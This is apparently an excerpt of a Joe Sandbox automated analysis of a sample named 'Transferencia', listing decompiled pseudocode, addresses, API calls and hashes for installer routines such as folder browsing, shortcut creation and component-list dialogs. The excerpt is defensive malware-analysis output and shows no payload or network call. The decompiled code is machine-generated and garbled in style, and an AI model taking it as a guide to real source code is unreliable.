                                                0x004049f7
                                                0x004049fa
                                                0x004049fd
                                                0x00404a03
                                                0x00404a0a
                                                0x00404a11
                                                0x00404ca8
                                                0x00404cba
                                                0x00404a17
                                                0x00404a1a
                                                0x00000000
                                                0x00404a1a
                                                0x00404a11

                                                APIs
                                                • GetDlgItem.USER32 ref: 004049B6
                                                • SetWindowTextW.USER32(00000000,?), ref: 004049E0
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404A91
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404A9C
                                                • lstrcmpiW.KERNEL32(Call,007A1F48,00000000,?,?), ref: 00404ACE
                                                • lstrcatW.KERNEL32(?,Call), ref: 00404ADA
                                                • SetDlgItemTextW.USER32 ref: 00404AEC
                                                  • Part of subcall function 00405B5E: GetDlgItemTextW.USER32(?,?,00000400,00404B23), ref: 00405B71
                                                  • Part of subcall function 004067A1: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406804
                                                  • Part of subcall function 004067A1: CharNextW.USER32(?,?,?,00000000,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406813
                                                  • Part of subcall function 004067A1: CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406818
                                                  • Part of subcall function 004067A1: CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 0040682B
                                                • GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,00000001,0079FF18,?,?,000003FB,?), ref: 00404BAF
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BCA
                                                  • Part of subcall function 00404D23: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
                                                  • Part of subcall function 00404D23: wsprintfW.USER32 ref: 00404DCD
                                                  • Part of subcall function 00404D23: SetDlgItemTextW.USER32 ref: 00404DE0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                • API String ID: 2624150263-3265145871
                                                • Opcode ID: 18688f4ff942e0cd0688df8116ebccbb4873b9e7479cc5ca6d046e93a4f243ee
                                                • Instruction ID: 86dd0b9b094f85dab2cef093751cf510b28304c980c81074e8bd76ad65710a38
                                                • Opcode Fuzzy Hash: 18688f4ff942e0cd0688df8116ebccbb4873b9e7479cc5ca6d046e93a4f243ee
                                                • Instruction Fuzzy Hash: 4DA190B1901208ABDB11EFA5CD45AEF77B8EF84314F11803BF601B62D1DB7C9A418B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E004021AA(void* __eflags) {
                                                				signed int _t52;
                                                				void* _t56;
                                                				intOrPtr* _t60;
                                                				intOrPtr _t61;
                                                				intOrPtr* _t62;
                                                				intOrPtr* _t64;
                                                				intOrPtr* _t66;
                                                				intOrPtr* _t68;
                                                				intOrPtr* _t70;
                                                				intOrPtr* _t72;
                                                				intOrPtr* _t74;
                                                				intOrPtr* _t76;
                                                				intOrPtr* _t78;
                                                				intOrPtr* _t80;
                                                				void* _t83;
                                                				intOrPtr* _t91;
                                                				signed int _t101;
                                                				signed int _t105;
                                                				void* _t107;
                                                
                                                				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                				_t52 =  *(_t107 - 0x20);
                                                				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                				_t101 = _t52 & 0x00008000;
                                                				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                				if(E00405E60( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                					E00402DA6(0x21);
                                                				}
                                                				_t56 = _t107 + 8;
                                                				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                                				if(_t56 < _t83) {
                                                					L14:
                                                					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                					_push(0xfffffff0);
                                                				} else {
                                                					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                					if(_t61 >= _t83) {
                                                						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                						if(_t101 == _t83) {
                                                							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x7b4000);
                                                						}
                                                						if(_t105 != _t83) {
                                                							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                						}
                                                						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                						if( *_t91 != _t83) {
                                                							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                						}
                                                						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                						}
                                                						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                					}
                                                					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                						_push(0xfffffff4);
                                                					} else {
                                                						goto L14;
                                                					}
                                                				}
                                                				E00401423();
                                                				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t107 - 4));
                                                				return 0;
                                                			}






















                                                0x004021b3
                                                0x004021bd
                                                0x004021c7
                                                0x004021d1
                                                0x004021dc
                                                0x004021df
                                                0x004021f9
                                                0x004021fc
                                                0x00402202
                                                0x00402205
                                                0x0040220f
                                                0x00402213
                                                0x00402213
                                                0x00402218
                                                0x00402229
                                                0x00402231
                                                0x004022e8
                                                0x004022e8
                                                0x004022ef
                                                0x00402237
                                                0x00402237
                                                0x00402246
                                                0x0040224a
                                                0x0040224d
                                                0x00402253
                                                0x00402261
                                                0x00402264
                                                0x00402266
                                                0x00402271
                                                0x00402271
                                                0x00402276
                                                0x00402278
                                                0x0040227f
                                                0x0040227f
                                                0x00402282
                                                0x0040228b
                                                0x0040228e
                                                0x00402294
                                                0x00402296
                                                0x004022a0
                                                0x004022a0
                                                0x004022a3
                                                0x004022ac
                                                0x004022af
                                                0x004022b8
                                                0x004022be
                                                0x004022c0
                                                0x004022ce
                                                0x004022ce
                                                0x004022d1
                                                0x004022d7
                                                0x004022d7
                                                0x004022da
                                                0x004022e0
                                                0x004022e6
                                                0x004022fb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004022e6
                                                0x004022f1
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID:
                                                • API String ID: 542301482-0
                                                • Opcode ID: 170ec6e86a9220940142559721d639d0d56cd3ceb1b5832377203a0a19f0ade3
                                                • Instruction ID: 703d758d197f09623ff28e3c758b152e072eb06d6e5445e6f92684eec68365f7
                                                • Opcode Fuzzy Hash: 170ec6e86a9220940142559721d639d0d56cd3ceb1b5832377203a0a19f0ade3
                                                • Instruction Fuzzy Hash: 47412571A00209EFCF40DFE4C989E9D7BB5BF49344B2045AAF505EB2D1DB799981CB84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 39%
                                                			E0040290B(short __ebx, short* __edi) {
                                                				void* _t21;
                                                
                                                				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                					E00406461( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                					_push(_t21 - 0x2b0);
                                                					_push(__edi);
                                                					E0040651A();
                                                				} else {
                                                					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                					 *__edi = __ebx;
                                                					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                				}
                                                				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t21 - 4));
                                                				return 0;
                                                			}




                                                0x00402923
                                                0x0040293e
                                                0x00402949
                                                0x0040294a
                                                0x00402a94
                                                0x00402925
                                                0x00402928
                                                0x0040292b
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 916bc7ecc775c30468185263b2e38d8e788801032425324021ee9d0e1a06674e
                                                • Instruction ID: 12288428410ef0014967daf25a5ca188ca533e908051b72e28feae2455f0dfde
                                                • Opcode Fuzzy Hash: 916bc7ecc775c30468185263b2e38d8e788801032425324021ee9d0e1a06674e
                                                • Instruction Fuzzy Hash: A6F05E71904114EED701DBA4D949AAEB378EF55318F20857BE101F21D0EBB88E119B2A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E00404EE3(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                				struct HWND__* _v8;
                                                				struct HWND__* _v12;
                                                				long _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				intOrPtr _v28;
                                                				signed char* _v32;
                                                				int _v36;
                                                				signed int _v44;
                                                				int _v48;
                                                				signed int* _v60;
                                                				signed char* _v64;
                                                				signed int _v68;
                                                				long _v72;
                                                				void* _v76;
                                                				intOrPtr _v80;
                                                				intOrPtr _v84;
                                                				void* _v88;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t198;
                                                				intOrPtr _t201;
                                                				long _t207;
                                                				signed int _t211;
                                                				signed int _t222;
                                                				void* _t225;
                                                				void* _t226;
                                                				int _t232;
                                                				long _t237;
                                                				long _t238;
                                                				signed int _t239;
                                                				signed int _t245;
                                                				signed int _t247;
                                                				signed char _t248;
                                                				signed char _t254;
                                                				void* _t258;
                                                				void* _t260;
                                                				signed char* _t278;
                                                				signed char _t279;
                                                				long _t284;
                                                				struct HWND__* _t291;
                                                				signed int* _t292;
                                                				int _t293;
                                                				long _t294;
                                                				signed int _t295;
                                                				void* _t297;
                                                				long _t298;
                                                				int _t299;
                                                				signed int _t300;
                                                				signed int _t303;
                                                				signed int _t311;
                                                				signed char* _t319;
                                                				int _t324;
                                                				void* _t326;
                                                
                                                				_t291 = _a4;
                                                				_v12 = GetDlgItem(_t291, 0x3f9);
                                                				_v8 = GetDlgItem(_t291, 0x408);
                                                				_t326 = SendMessageW;
                                                				_v24 =  *0x7a8a88;
                                                				_v28 =  *0x7a8a70 + 0x94;
                                                				if(_a8 != 0x110) {
                                                					L23:
                                                					if(_a8 != 0x405) {
                                                						_t301 = _a16;
                                                					} else {
                                                						_a12 = 0;
                                                						_t301 = 1;
                                                						_a8 = 0x40f;
                                                						_a16 = 1;
                                                					}
                                                					if(_a8 == 0x4e || _a8 == 0x413) {
                                                						_v16 = _t301;
                                                						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                							if(( *0x7a8a79 & 0x00000002) != 0) {
                                                								L41:
                                                								if(_v16 != 0) {
                                                									_t237 = _v16;
                                                									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                									}
                                                									_t238 = _v16;
                                                									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                										_t301 = _v24;
                                                										_t239 =  *(_t238 + 0x5c);
                                                										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                										} else {
                                                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                										}
                                                									}
                                                								}
                                                								goto L48;
                                                							}
                                                							if(_a8 == 0x413) {
                                                								L33:
                                                								_t301 = 0 | _a8 != 0x00000413;
                                                								_t245 = E00404E31(_v8, _a8 != 0x413);
                                                								_t295 = _t245;
                                                								if(_t295 >= 0) {
                                                									_t94 = _v24 + 8; // 0x8
                                                									_t301 = _t245 * 0x818 + _t94;
                                                									_t247 =  *_t301;
                                                									if((_t247 & 0x00000010) == 0) {
                                                										if((_t247 & 0x00000040) == 0) {
                                                											_t248 = _t247 ^ 0x00000001;
                                                										} else {
                                                											_t254 = _t247 ^ 0x00000080;
                                                											if(_t254 >= 0) {
                                                												_t248 = _t254 & 0x000000fe;
                                                											} else {
                                                												_t248 = _t254 | 0x00000001;
                                                											}
                                                										}
                                                										 *_t301 = _t248;
                                                										E0040117D(_t295);
                                                										_a12 = _t295 + 1;
                                                										_a16 =  !( *0x7a8a78) >> 0x00000008 & 0x00000001;
                                                										_a8 = 0x40f;
                                                									}
                                                								}
                                                								goto L41;
                                                							}
                                                							_t301 = _a16;
                                                							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                								goto L41;
                                                							}
                                                							goto L33;
                                                						} else {
                                                							goto L48;
                                                						}
                                                					} else {
                                                						L48:
                                                						if(_a8 != 0x111) {
                                                							L56:
                                                							if(_a8 == 0x200) {
                                                								SendMessageW(_v8, 0x200, 0, 0);
                                                							}
                                                							if(_a8 == 0x40b) {
                                                								_t225 =  *0x7a1f2c;
                                                								if(_t225 != 0) {
                                                									ImageList_Destroy(_t225);
                                                								}
                                                								_t226 =  *0x7a1f40;
                                                								if(_t226 != 0) {
                                                									GlobalFree(_t226);
                                                								}
                                                								 *0x7a1f2c = 0;
                                                								 *0x7a1f40 = 0;
                                                								 *0x7a8ac0 = 0;
                                                							}
                                                							if(_a8 != 0x40f) {
                                                								L90:
                                                								if(_a8 == 0x420 && ( *0x7a8a79 & 0x00000001) != 0) {
                                                									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                									ShowWindow(_v8, _t324);
                                                									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                								}
                                                								goto L93;
                                                							} else {
                                                								E004011EF(_t301, 0, 0);
                                                								_t198 = _a12;
                                                								if(_t198 != 0) {
                                                									if(_t198 != 0xffffffff) {
                                                										_t198 = _t198 - 1;
                                                									}
                                                									_push(_t198);
                                                									_push(8);
                                                									E00404EB1();
                                                								}
                                                								if(_a16 == 0) {
                                                									L75:
                                                									E004011EF(_t301, 0, 0);
                                                									_v36 =  *0x7a1f40;
                                                									_t201 =  *0x7a8a88;
                                                									_v64 = 0xf030;
                                                									_v24 = 0;
                                                									if( *0x7a8a8c <= 0) {
                                                										L86:
                                                										if( *0x7a8b1e == 0x400) {
                                                											InvalidateRect(_v8, 0, 1);
                                                										}
                                                										if( *((intOrPtr*)( *0x7a7a3c + 0x10)) != 0) {
                                                											E00404DEC(0x3ff, 0xfffffffb, E00404E04(5));
                                                										}
                                                										goto L90;
                                                									}
                                                									_t292 = _t201 + 8;
                                                									do {
                                                										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                										if(_t207 != 0) {
                                                											_t303 =  *_t292;
                                                											_v72 = _t207;
                                                											_v76 = 8;
                                                											if((_t303 & 0x00000001) != 0) {
                                                												_v76 = 9;
                                                												_v60 =  &(_t292[4]);
                                                												_t292[0] = _t292[0] & 0x000000fe;
                                                											}
                                                											if((_t303 & 0x00000040) == 0) {
                                                												_t211 = (_t303 & 0x00000001) + 1;
                                                												if((_t303 & 0x00000010) != 0) {
                                                													_t211 = _t211 + 3;
                                                												}
                                                											} else {
                                                												_t211 = 3;
                                                											}
                                                											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                										}
                                                										_v24 = _v24 + 1;
                                                										_t292 =  &(_t292[0x206]);
                                                									} while (_v24 <  *0x7a8a8c);
                                                									goto L86;
                                                								} else {
                                                									_t293 = E004012E2( *0x7a1f40);
                                                									E00401299(_t293);
                                                									_t222 = 0;
                                                									_t301 = 0;
                                                									if(_t293 <= 0) {
                                                										L74:
                                                										SendMessageW(_v12, 0x14e, _t301, 0);
                                                										_a16 = _t293;
                                                										_a8 = 0x420;
                                                										goto L75;
                                                									} else {
                                                										goto L71;
                                                									}
                                                									do {
                                                										L71:
                                                										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                											_t301 = _t301 + 1;
                                                										}
                                                										_t222 = _t222 + 1;
                                                									} while (_t222 < _t293);
                                                									goto L74;
                                                								}
                                                							}
                                                						}
                                                						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                							goto L93;
                                                						} else {
                                                							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                							if(_t232 == 0xffffffff) {
                                                								goto L93;
                                                							}
                                                							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                								_t294 = 0x20;
                                                							}
                                                							E00401299(_t294);
                                                							SendMessageW(_a4, 0x420, 0, _t294);
                                                							_a12 = _a12 | 0xffffffff;
                                                							_a16 = 0;
                                                							_a8 = 0x40f;
                                                							goto L56;
                                                						}
                                                					}
                                                				} else {
                                                					_v36 = 0;
                                                					_v20 = 2;
                                                					 *0x7a8ac0 = _t291;
                                                					 *0x7a1f40 = GlobalAlloc(0x40,  *0x7a8a8c << 2);
                                                					_t258 = LoadImageW( *0x7a8a60, 0x6e, 0, 0, 0, 0);
                                                					 *0x7a1f34 =  *0x7a1f34 | 0xffffffff;
                                                					_t297 = _t258;
                                                					 *0x7a1f3c = SetWindowLongW(_v8, 0xfffffffc, E004054F0);
                                                					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                					 *0x7a1f2c = _t260;
                                                					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                					SendMessageW(_v8, 0x1109, 2,  *0x7a1f2c);
                                                					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                					}
                                                					DeleteObject(_t297);
                                                					_t298 = 0;
                                                					do {
                                                						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                							if(_t298 != 0x20) {
                                                								_v20 = 0;
                                                							}
                                                							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406557(_t298, 0, _t326, 0, _t266)), _t298);
                                                						}
                                                						_t298 = _t298 + 1;
                                                					} while (_t298 < 0x21);
                                                					_t299 = _a16;
                                                					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                					_push(0x15);
                                                					E00404476(_a4);
                                                					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                					_push(0x16);
                                                					E00404476(_a4);
                                                					_t300 = 0;
                                                					_v16 = 0;
                                                					if( *0x7a8a8c <= 0) {
                                                						L19:
                                                						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                						goto L20;
                                                					} else {
                                                						_t319 = _v24 + 8;
                                                						_v32 = _t319;
                                                						do {
                                                							_t278 =  &(_t319[0x10]);
                                                							if( *_t278 != 0) {
                                                								_v64 = _t278;
                                                								_t279 =  *_t319;
                                                								_v88 = _v16;
                                                								_t311 = 0x20;
                                                								_v84 = 0xffff0002;
                                                								_v80 = 0xd;
                                                								_v68 = _t311;
                                                								_v44 = _t300;
                                                								_v72 = _t279 & _t311;
                                                								if((_t279 & 0x00000002) == 0) {
                                                									if((_t279 & 0x00000004) == 0) {
                                                										 *( *0x7a1f40 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                									} else {
                                                										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                									}
                                                								} else {
                                                									_v80 = 0x4d;
                                                									_v48 = 1;
                                                									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                									_v36 = 1;
                                                									 *( *0x7a1f40 + _t300 * 4) = _t284;
                                                									_v16 =  *( *0x7a1f40 + _t300 * 4);
                                                								}
                                                							}
                                                							_t300 = _t300 + 1;
                                                							_t319 =  &(_v32[0x818]);
                                                							_v32 = _t319;
                                                						} while (_t300 <  *0x7a8a8c);
                                                						if(_v36 != 0) {
                                                							L20:
                                                							if(_v20 != 0) {
                                                								E004044AB(_v8);
                                                								goto L23;
                                                							} else {
                                                								ShowWindow(_v12, 5);
                                                								E004044AB(_v12);
                                                								L93:
                                                								return E004044DD(_a8, _a12, _a16);
                                                							}
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                			}


























































                                                0x00404eea
                                                0x00404f03
                                                0x00404f08
                                                0x00404f10
                                                0x00404f16
                                                0x00404f2c
                                                0x00404f2f
                                                0x0040515a
                                                0x00405161
                                                0x00405175
                                                0x00405163
                                                0x00405165
                                                0x00405168
                                                0x00405169
                                                0x00405170
                                                0x00405170
                                                0x00405181
                                                0x0040518f
                                                0x00405192
                                                0x004051a8
                                                0x0040521d
                                                0x00405220
                                                0x00405222
                                                0x0040522c
                                                0x0040523a
                                                0x0040523a
                                                0x0040523c
                                                0x00405246
                                                0x0040524c
                                                0x0040524f
                                                0x00405252
                                                0x0040526d
                                                0x00405254
                                                0x0040525e
                                                0x0040525e
                                                0x00405252
                                                0x00405246
                                                0x00000000
                                                0x00405220
                                                0x004051ad
                                                0x004051b8
                                                0x004051bd
                                                0x004051c4
                                                0x004051c9
                                                0x004051cd
                                                0x004051d8
                                                0x004051d8
                                                0x004051dc
                                                0x004051e0
                                                0x004051e4
                                                0x004051f7
                                                0x004051e6
                                                0x004051e6
                                                0x004051ed
                                                0x004051f3
                                                0x004051ef
                                                0x004051ef
                                                0x004051ef
                                                0x004051ed
                                                0x004051fb
                                                0x004051fd
                                                0x00405210
                                                0x00405213
                                                0x00405216
                                                0x00405216
                                                0x004051e0
                                                0x00000000
                                                0x004051cd
                                                0x004051af
                                                0x004051b6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405270
                                                0x00405270
                                                0x00405277
                                                0x004052e8
                                                0x004052f0
                                                0x004052f8
                                                0x004052f8
                                                0x00405301
                                                0x00405303
                                                0x0040530a
                                                0x0040530d
                                                0x0040530d
                                                0x00405313
                                                0x0040531a
                                                0x0040531d
                                                0x0040531d
                                                0x00405323
                                                0x00405329
                                                0x0040532f
                                                0x0040532f
                                                0x0040533c
                                                0x0040549d
                                                0x004054a4
                                                0x004054c1
                                                0x004054c7
                                                0x004054d9
                                                0x004054d9
                                                0x00000000
                                                0x00405342
                                                0x00405344
                                                0x00405349
                                                0x0040534e
                                                0x00405353
                                                0x00405355
                                                0x00405355
                                                0x00405356
                                                0x00405357
                                                0x00405359
                                                0x00405359
                                                0x00405361
                                                0x004053a2
                                                0x004053a4
                                                0x004053b4
